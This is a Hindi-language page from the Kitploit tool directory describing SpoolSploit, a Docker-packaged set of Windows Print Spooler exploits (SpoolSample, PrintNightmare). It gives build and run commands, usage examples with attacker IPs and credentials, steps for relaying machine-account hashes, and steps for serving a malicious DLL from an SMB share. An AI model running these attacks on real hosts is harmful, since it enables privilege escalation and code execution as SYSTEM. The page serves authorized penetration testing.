Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SpoolSploit — विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का एक संग्रह जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत है। | Kitploit
उपकरण/GitHubGitHub/beetlechunks/spoolsploit
विशेषाधिकार वृद्धिभेद्यता स्कैनरकंटेनर सुरक्षाशोषण फ्रेमवर्कशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंग
GitHubbeetlechunks/spoolsploit

SpoolSploit

विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का एक संग्रह जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत है।

रिपॉजिटरी देखें
552915 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SpoolSploit

विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का एक संग्रह जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत किया गया है।

सारांश

SpoolSploit एक संग्रह है विंडोज प्रिंट स्पूलर एक्सप्लॉइट्स का जो व्यावहारिक शोषण के लिए अन्य उपयोगिताओं के साथ कंटेनरीकृत किया गया है। विशेषाधिकार को बढ़ाने और पूर्ण सिस्टम एक्सेस के साथ एंडपॉइंट पर दुर्भावनापूर्ण DLL निष्पादित करने के लिए मशीन खाता क्रेडेंशियल्स को रिले करना एक अत्यधिक प्रभावी तरीका होगा।

img

शुरू करना

रिलीज़ तिथि के अनुसार, SpoolSploit Docker कंटेनर का परीक्षण MacOS, Ubuntu Linux, और Windows 10 के नवीनतम संस्करणों पर सफलतापूर्वक किया गया है।

हालांकि आवश्यक नहीं है, यदि आप SpoolSploit कंटेनर के अंदर ही दुर्भावनापूर्ण DLL होस्ट करना या क्रेडेंशियल रिले हमले करना चाहते हैं, तो आपको यह सुनिश्चित करना चाहिए कि Docker चलाने वाले होस्ट पर पोर्ट 445 उपयोग में न हो। यह सबसे अधिक तब होता है जब इस कंटेनर को Windows होस्ट पर चलाया जाता है, क्योंकि यह डिफ़ॉल्ट रूप से पोर्ट 445 का उपयोग करता है। यदि आपके होस्ट पर पोर्ट 445 को अक्षम करना व्यावहारिक नहीं है, तो यह ठीक है! आप बस डॉकर कंटेनर को एक वर्चुअल मशीन में चला सकते हैं जिसमें नेटवर्क एडॉप्टर ब्रिज मोड में कॉन्फ़िगर किया गया हो। यह आपको दुर्भावनापूर्ण DLL और रिले क्रेडेंशियल्स प्रदान करने की अनुमति देगा। यदि आप केवल दुर्भावनापूर्ण DLL प्रदान करना चाहते हैं, तो आप बस अपने होस्ट OS या एक समझौता किए गए सर्वर शेयर पर एक अनाम एक्सेस शेयर पर DLL होस्ट कर सकते हैं।

SpoolSploit Docker कंटेनर बनाएं और उस तक पहुँचें

  1. इस रिपॉजिटरी को क्लोन करें
root@kitploit:~
git clone https://github.com/BeetleChunks/SpoolSploit
  1. SpoolSploit Docker कंटेनर इमेज बनाएं
root@kitploit:~
cd SpoolSploit
sudo docker build -t spoolsploit .
  1. SpoolSploit Docker कंटेनर बनाएं और शुरू करें
root@kitploit:~
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
  1. कंटेनर से संलग्न हों
root@kitploit:~
sudo docker exec -it spoolsploit /bin/bash

कमांड-लाइन उपयोग

root@kitploit:~
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
  -h, --help            show this help message and exit
  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
                        Attack type to execute on target(s).
  -rH RHOST, --rhost RHOST
                        Remote target IP, CIDR range, or filename (file:<path>)
  -rP {139,445}, --rport {139,445}
                        Remote SMB server port.
  -lH LHOST, --lhost LHOST
                        Listening hostname or IP
  -lS LSHARE, --lshare LSHARE
                        Staging SMB share (UNC)
  -d DOMAIN, --domain DOMAIN
                        Domain for authentication
  -u USER, --username USER
                        Username for authentication
  -p PASSWD, --password PASSWD
                        Password for authentication

Example - spoolsample:
  python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
  python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - विंडोज मशीन खाता क्रेडेंशियल्स कैप्चर करें और रिले करें

SpoolSploit Docker कंटेनर में SpoolSploit में spoolsample हमले को निष्पादित करने से प्राप्त मशीन खाता हैश को रिले करने के लिए Responder शामिल है। चूंकि कई उत्कृष्ट लेख विशेषाधिकार वृद्धि के लिए विशेषाधिकार प्राप्त मशीन खाता क्रेडेंशियल्स को रिले करने की प्रक्रिया का विवरण देते हैं, मैं यहां उन विवरणों में नहीं जाऊंगा।

PrintNightmare (CVE-2021-1675) - विंडोज लक्ष्यों पर SYSTEM के रूप में दुर्भावनापूर्ण DLL निष्पादित करें

SpoolSploit कंटेनर में Impacket के माध्यम से कार्यान्वित एक SMB सर्वर शामिल है। इस सर्वर का उपयोग SpoolSploit में printnightmare हमले को निष्पादित करते समय दुर्भावनापूर्ण DLL होस्ट करने के लिए किया जा सकता है। डिफ़ॉल्ट SMB सर्वर सेटिंग्स काम करती हैं, लेकिन यदि आप उन्हें अनुकूलित करना चाहते हैं, तो आप /home/dlogmas/smbserver/smb-v1.conf पर स्थित कॉन्फ़िगरेशन फ़ाइल को संशोधित कर सकते हैं।

आपको केवल इतना करना है कि अपने DLL को SpoolSploit कंटेनर में SMB सर्वर के शेयर फ़ोल्डर में कॉपी करें। कंटेनर में शेयर पथ /home/dlogmas/smbserver/share/ है। निम्नलिखित कमांड दर्शाते हैं कि SpoolSploit कंटेनर में DLL कैसे अपलोड करें और इसे SMB सर्वर के लिए सुलभ बनाएं।

root@kitploit:~
sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'

अस्वीकरण

यह प्रूफ-ऑफ-कॉन्सेप्ट कोड अकादमिक अनुसंधान के लिए बनाया गया है और इसका उपयोग सिस्टम के खिलाफ नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। कोड बिना किसी गारंटी या इसके निष्पादन के वादे के प्रदान किया गया है। मैं इस कोड के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हूँ।

श्रेय

SpoolSample - Microsoft सुविधा

  • leechristensen ने SpoolSample एक्सप्लॉइट की खोज की और एक C# POC बनाया SpoolSample
  • 3xocyte ने एक Python2 SpoolSample POC बनाया dementor।

PrintNightmare - CVE-2021-1675 / CVE-2021-34527

  • cube0x0 ने MS-PAR और MS-RPRN प्रोटोकॉल और API कॉल को Impacket में लागू करने के बाद Python PrintNightmare एक्सप्लॉइट बनाया।
  • Zhiniang Peng और Xuefeng Li ने इस एक्सप्लॉइट की खोज की।
टूल डाउनलोड करें